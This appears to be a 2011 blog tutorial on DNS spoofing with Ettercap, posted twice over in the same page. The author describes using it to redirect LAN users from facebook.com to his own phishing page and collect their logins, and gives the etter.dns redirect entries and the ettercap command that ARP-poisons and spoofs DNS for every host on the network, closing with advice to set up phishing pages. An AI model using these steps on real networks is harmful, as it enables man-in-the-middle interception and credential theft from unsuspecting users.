Sunday, October 30, 2011
Hi guys. I've been away for long time coz of new job. but i m back. I would like to share one of my school projects with you guys. It is DNS Spoofing with Ettercap which is to fool people in the LAN when they access to certain website, requests will be redirected to your local website or whatever websites you want. Wait! It is only work in the LAN. I haven't tested on 2 LANs connected via router. In this tutorial, I setup the Facebook phishing page on my Web server. so when people go to facebook.com, they will get my facebook page. When they log in. i got their accounts.
What is Ettercap?
Ettercap is network monitoring and security auditing tool and also know as a good suite for man in the middle attack on LAN. It is an open source software for Unix and Windows platforms. It supports active and passive dissection of many protocols (including ciphered ones) and provides many features for network and host analysis.
DNS spoofing
The following steps will show how to use Ettercap for DNS Spoofing with DNS_Spoof Plug-in on Local Area Network with Local website running. This Ettercap plug-in is only one potential way to pull off DNS spoofing and only works if the attacker is on same subnet. These instructions are only for Linux based Ettercap.
1. Download Link: click here
2. Install Ettercap on linux or use Backtrack 3 Live CD. (I use backtrack 3 Live USB)
3. Open Terminal Window and Type ifconfig to check yr network cards and settings
4. Modify the Ettercap DNS spoof plug-in file which can be found in following location:
/usr/local/share/ettercap/etter.dns
5. Use nano command to edit the file from terminal or use any GUI text editor
6. This is an example of what inside the file :
############################################################################
# #
# ettercap -- etter.dns -- host file for phantom plugin #
# #
# Copyright (C) 2001 ALoR <alor@users.sourceforge.net> #
# NaGA <crwm@freemail.it> #
# #
# This program is free software; you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation; either version 2 of the License, or #
# (at your option) any later version. #
# #
############################################################################
# Sample hosts file for phantom plugin #
# #
# the format is : #
# #
# xxx.xxx.xxx.xxx<TAB>www.myhostname.com #
# #
# NOTE: the wildcarded hosts can't be used to poison the PTR requests #
# so if you want to reverse poison you have to specify a plain #
# host. (look at the facebook example) #
###########################################################################
# facebook sucks;)
# redirect it to my assbook
192.168.1.1 A facebook.com
192.168.1.1 A *.facebook.com
192.168.1.1 PTR http://www.facebook.com
NOTE: After ip like:192.168.1.1[tab button]+[spacebutton]A[tab button]+[spacebutton]facebook.com
7. In above example, facebook.com is redirected to local website when victims’ computers make DNS request to facebook.com. Save the file and close it.
8. Use the following command to do ARP poisoning and start DNS spoofing for all computers in the Network:
ettercap -T -q -i eth0 -P dns_spoof -M arp // //
9. For more details about these switches, type ettercap -help
10. This will activate the ARP poisoning and DNS spoofing. Press Ctrl+C to stop the attack.
11. When the victim checks the http://www.facebook.com, it will redirect to local website.
12. By using this method, you can setup the Phishing Page and redirect the victims to your Page.
13. Happy Hacking. Cheers...
Thank You
Don't forget to say thanks and post ur comments.
What is Ettercap?
Ettercap is network monitoring and security auditing tool and also know as a good suite for man in the middle attack on LAN. It is an open source software for Unix and Windows platforms. It supports active and passive dissection of many protocols (including ciphered ones) and provides many features for network and host analysis.
DNS spoofing
The following steps will show how to use Ettercap for DNS Spoofing with DNS_Spoof Plug-in on Local Area Network with Local website running. This Ettercap plug-in is only one potential way to pull off DNS spoofing and only works if the attacker is on same subnet. These instructions are only for Linux based Ettercap.
1. Download Link: click here
2. Install Ettercap on linux or use Backtrack 3 Live CD. (I use backtrack 3 Live USB)
3. Open Terminal Window and Type ifconfig to check yr network cards and settings
4. Modify the Ettercap DNS spoof plug-in file which can be found in following location:
/usr/local/share/ettercap/etter.dns
5. Use nano command to edit the file from terminal or use any GUI text editor
6. This is an example of what inside the file :
############################################################################
# #
# ettercap -- etter.dns -- host file for phantom plugin #
# #
# Copyright (C) 2001 ALoR <alor@users.sourceforge.net> #
# NaGA <crwm@freemail.it> #
# #
# This program is free software; you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation; either version 2 of the License, or #
# (at your option) any later version. #
# #
############################################################################
# Sample hosts file for phantom plugin #
# #
# the format is : #
# #
# xxx.xxx.xxx.xxx<TAB>www.myhostname.com #
# #
# NOTE: the wildcarded hosts can't be used to poison the PTR requests #
# so if you want to reverse poison you have to specify a plain #
# host. (look at the facebook example) #
###########################################################################
# facebook sucks;)
# redirect it to my assbook
192.168.1.1 A facebook.com
192.168.1.1 A *.facebook.com
192.168.1.1 PTR http://www.facebook.com
NOTE: After ip like:192.168.1.1[tab button]+[spacebutton]A[tab button]+[spacebutton]facebook.com
7. In above example, facebook.com is redirected to local website when victims’ computers make DNS request to facebook.com. Save the file and close it.
8. Use the following command to do ARP poisoning and start DNS spoofing for all computers in the Network:
ettercap -T -q -i eth0 -P dns_spoof -M arp // //
9. For more details about these switches, type ettercap -help
10. This will activate the ARP poisoning and DNS spoofing. Press Ctrl+C to stop the attack.
11. When the victim checks the http://www.facebook.com, it will redirect to local website.
12. By using this method, you can setup the Phishing Page and redirect the victims to your Page.
13. Happy Hacking. Cheers...
Thank You
Don't forget to say thanks and post ur comments.